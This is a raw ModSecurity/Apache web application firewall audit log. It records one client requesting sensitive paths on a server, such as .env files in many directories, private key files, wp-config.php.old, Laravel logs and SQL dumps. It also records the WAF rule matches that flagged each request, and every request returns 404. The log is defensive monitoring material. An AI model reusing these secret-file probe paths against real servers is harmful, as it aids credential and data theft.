HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --da810616-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --da810616-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/src/wp-config.php.old"] [unique_id "aFCsMArsPejRtmHkrKLg2gAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/src/wp-config.php.old"] [unique_id "aFCsMArsPejRtmHkrKLg2gAAAAE"] Stopwatch: 1750117424561174 2921 (- - -) Stopwatch2: 1750117424561174 2921; combined=1747, p1=384, p2=1243, p3=18, p4=24, p5=78, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da810616-Z-- --c0a5c965-A-- [17/Jun/2025:05:13:45.006346 +0530] aFCsMYoVQnPDyHnl9oPT_gAAAAY 185.177.72.204 36066 127.0.0.1 7080 --c0a5c965-B-- GET /ssl/private.key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0a5c965-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0a5c965-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/ssl/private.key"] [unique_id "aFCsMYoVQnPDyHnl9oPT_gAAAAY"] Stopwatch: 1750117425002990 3413 (- - -) Stopwatch2: 1750117425002990 3413; combined=2209, p1=357, p2=1728, p3=24, p4=29, p5=71, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0a5c965-Z-- --49d86a2a-A-- [17/Jun/2025:05:13:45.336719 +0530] aFCsMWMOUduHrxpwbslYnQAAAAM 185.177.72.204 36088 127.0.0.1 7080 --49d86a2a-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --49d86a2a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --49d86a2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/storage/logs/laravel.log"] [unique_id "aFCsMWMOUduHrxpwbslYnQAAAAM"] Stopwatch: 1750117425333739 3022 (- - -) Stopwatch2: 1750117425333739 3022; combined=1815, p1=348, p2=1374, p3=19, p4=23, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49d86a2a-Z-- --d15ae86d-A-- [17/Jun/2025:05:13:45.446844 +0530] aFCsMQGFf516NUzzD0B3pQAAAAg 185.177.72.204 36102 127.0.0.1 7080 --d15ae86d-B-- GET /storage/oauth-private.key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d15ae86d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d15ae86d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/storage/oauth-private.key"] [unique_id "aFCsMQGFf516NUzzD0B3pQAAAAg"] Stopwatch: 1750117425443837 3051 (- - -) Stopwatch2: 1750117425443837 3051; combined=1869, p1=326, p2=1446, p3=19, p4=26, p5=52, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d15ae86d-Z-- --5a83af74-A-- [17/Jun/2025:05:13:45.556871 +0530] aFCsMZVkCcfT-Z8NQYzFQgAAAAc 185.177.72.204 36104 127.0.0.1 7080 --5a83af74-B-- GET /storage/oauth-public.key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5a83af74-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a83af74-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/storage/oauth-public.key"] [unique_id "aFCsMZVkCcfT-Z8NQYzFQgAAAAc"] Stopwatch: 1750117425554060 2859 (- - -) Stopwatch2: 1750117425554060 2859; combined=1715, p1=330, p2=1295, p3=18, p4=23, p5=49, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5a83af74-Z-- --60e9b863-A-- [17/Jun/2025:05:13:45.888369 +0530] aFCsMVCTF37l_jAzt4oTQwAAAAU 185.177.72.204 36132 127.0.0.1 7080 --60e9b863-B-- GET /symfony/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --60e9b863-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --60e9b863-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/symfony/.env"] [unique_id "aFCsMVCTF37l_jAzt4oTQwAAAAU"] Stopwatch: 1750117425885271 3140 (- - -) Stopwatch2: 1750117425885271 3140; combined=1896, p1=378, p2=1416, p3=23, p4=31, p5=48, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60e9b863-Z-- --f48c1f65-A-- [17/Jun/2025:05:13:46.108983 +0530] aFCsMgrsPejRtmHkrKLg3AAAAAE 185.177.72.204 36154 127.0.0.1 7080 --f48c1f65-B-- GET /terraform/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f48c1f65-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f48c1f65-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/terraform/.env"] [unique_id "aFCsMgrsPejRtmHkrKLg3AAAAAE"] Stopwatch: 1750117426105824 3223 (- - -) Stopwatch2: 1750117426105824 3223; combined=1983, p1=379, p2=1485, p3=20, p4=28, p5=71, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f48c1f65-Z-- --fa4a0c51-A-- [17/Jun/2025:05:13:46.330498 +0530] aFCsMlJfblPUQiSn5r2R7AAAAAA 185.177.72.204 36182 127.0.0.1 7080 --fa4a0c51-B-- GET /test/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fa4a0c51-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa4a0c51-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/test/.env"] [unique_id "aFCsMlJfblPUQiSn5r2R7AAAAAA"] Stopwatch: 1750117426327118 3441 (- - -) Stopwatch2: 1750117426327118 3441; combined=2027, p1=452, p2=1469, p3=22, p4=27, p5=56, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa4a0c51-Z-- --d9ab250b-A-- [17/Jun/2025:05:13:46.552169 +0530] aFCsMtyZ4SMykfn97vy30wAAAAs 185.177.72.204 36194 127.0.0.1 7080 --d9ab250b-B-- GET /test/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d9ab250b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ab250b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/test/db.sql"] [unique_id "aFCsMtyZ4SMykfn97vy30wAAAAs"] Stopwatch: 1750117426548166 4059 (- - -) Stopwatch2: 1750117426548166 4059; combined=2526, p1=462, p2=1938, p3=27, p4=31, p5=68, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9ab250b-Z-- --51835b14-A-- [17/Jun/2025:05:13:47.423277 +0530] aFCsM9yZ4SMykfn97vy31AAAAAs 185.177.72.204 36278 127.0.0.1 7080 --51835b14-B-- GET /tmp/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --51835b14-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --51835b14-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/tmp/.env"] [unique_id "aFCsM9yZ4SMykfn97vy31AAAAAs"] Stopwatch: 1750117427420316 3066 (- - -) Stopwatch2: 1750117427420316 3066; combined=1772, p1=392, p2=1284, p3=18, p4=24, p5=54, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51835b14-Z-- --e2c04261-A-- [17/Jun/2025:05:13:47.859114 +0530] aFCsM1JfblPUQiSn5r2R7gAAAAA 185.177.72.204 36328 127.0.0.1 7080 --e2c04261-B-- GET /tmp/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e2c04261-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2c04261-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/tmp/db.sql"] [unique_id "aFCsM1JfblPUQiSn5r2R7gAAAAA"] Stopwatch: 1750117427855860 3298 (- - -) Stopwatch2: 1750117427855860 3298; combined=2038, p1=361, p2=1564, p3=19, p4=35, p5=59, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2c04261-Z-- --b67a3927-A-- [17/Jun/2025:05:13:47.968789 +0530] aFCsM9yZ4SMykfn97vy31QAAAAs 185.177.72.204 36336 127.0.0.1 7080 --b67a3927-B-- GET /tmp/db_dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b67a3927-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b67a3927-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/tmp/db_dump.sql"] [unique_id "aFCsM9yZ4SMykfn97vy31QAAAAs"] Stopwatch: 1750117427965012 3832 (- - -) Stopwatch2: 1750117427965012 3832; combined=2328, p1=459, p2=1740, p3=25, p4=33, p5=71, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b67a3927-Z-- --5e4ea033-A-- [17/Jun/2025:05:13:48.078023 +0530] aFCsNAJ4p5Cdblnjra54PgAAAAI 185.177.72.204 36340 127.0.0.1 7080 --5e4ea033-B-- GET /tmp/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5e4ea033-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e4ea033-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/tmp/error.log"] [unique_id "aFCsNAJ4p5Cdblnjra54PgAAAAI"] Stopwatch: 1750117428074754 3321 (- - -) Stopwatch2: 1750117428074754 3321; combined=2045, p1=375, p2=1558, p3=21, p4=35, p5=56, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e4ea033-Z-- --afed8f33-A-- [17/Jun/2025:05:13:48.839973 +0530] aFCsNFCTF37l_jAzt4oTRgAAAAU 185.177.72.204 36408 127.0.0.1 7080 --afed8f33-B-- GET /vault/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --afed8f33-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --afed8f33-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/vault/.env"] [unique_id "aFCsNFCTF37l_jAzt4oTRgAAAAU"] Stopwatch: 1750117428837090 2924 (- - -) Stopwatch2: 1750117428837090 2924; combined=1689, p1=386, p2=1212, p3=18, p4=24, p5=48, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --afed8f33-Z-- --ed98c97c-A-- [17/Jun/2025:05:13:49.496071 +0530] aFCsNQJ4p5Cdblnjra54QAAAAAI 185.177.72.204 56414 127.0.0.1 7080 --ed98c97c-B-- GET /vendor/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ed98c97c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed98c97c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/vendor/.env"] [unique_id "aFCsNQJ4p5Cdblnjra54QAAAAAI"] Stopwatch: 1750117429493148 2966 (- - -) Stopwatch2: 1750117429493148 2966; combined=1719, p1=426, p2=1197, p3=18, p4=24, p5=54, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed98c97c-Z-- --6684446b-A-- [17/Jun/2025:05:13:49.604809 +0530] aFCsNZWbMc1Q3J_M-mhI_QAAAAo 185.177.72.204 56422 127.0.0.1 7080 --6684446b-B-- GET /vendor/aws/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6684446b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6684446b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/vendor/aws/.env"] [unique_id "aFCsNZWbMc1Q3J_M-mhI_QAAAAo"] Stopwatch: 1750117429602040 2813 (- - -) Stopwatch2: 1750117429602040 2813; combined=1675, p1=364, p2=1222, p3=17, p4=23, p5=49, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6684446b-Z-- --89533e41-A-- [17/Jun/2025:05:13:50.259573 +0530] aFCsNlCTF37l_jAzt4oTSAAAAAU 185.177.72.204 56470 127.0.0.1 7080 --89533e41-B-- GET /web/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --89533e41-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --89533e41-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname 